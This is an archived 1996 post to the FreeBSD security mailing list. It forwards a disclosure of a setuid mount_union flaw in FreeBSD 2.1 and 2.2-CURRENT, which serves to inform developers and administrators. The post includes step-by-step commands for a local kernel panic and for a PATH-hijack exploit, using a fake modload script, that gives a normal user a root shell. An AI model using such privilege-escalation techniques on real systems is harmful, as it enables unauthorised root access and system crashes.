Skip site navigation (1)Skip section navigation (2) 
Date:      Fri, 17 May 1996 19:44:25 -0400 (EDT)
From:      Brian Tao <taob@io.org>
To:        FREEBSD-SECURITY-L <freebsd-security@freebsd.org>
Subject:   SECURITY BUG in FreeBSD (fwd)
Message-ID:  <Pine.NEB.3.92.960517194336.6632B-100000@zap.io.org>
next in thread | raw e-mail | index | archive | help 
    Here's the same bug reported by someone else on the -hackers list,
with both the kernel panic and root shell exploits.
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

---------- Forwarded message ----------
Date: Fri, 17 May 1996 19:06:03 -0400 (EDT)
From: Dan Polivy <danp@library.pride.net>
To: freebsd-hackers@freebsd.org
Subject: SECURITY BUG in FreeBSD (fwd)

I came across this in my travels...thought you guys may be interesting
(in  case you didn't already know)...It's worked for me on my -RELEASE,
and -STABLE machines...dunno about any others...

Dan

+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|         JRI HIS MIS Systems Administrator/Tech Support         |
|////////////////////////////////////////////////////////////////|
|    danp@busstop.org dpolivy@jri.org danp@library.pride.net     |
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|
|        Check out JRI's Homepage at http://www.jri.org          |
|////////////////////////////////////////////////////////////////|
| EMail health@jri.org or check out http://www.jri.org/jrihealth |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

---------------------------------
Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!

Hole found by Adam Kubicki

Best wishes
    Chris Labanowski

    KL
----------------------------------

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.NEB.3.92.960517194336.6632B-100000>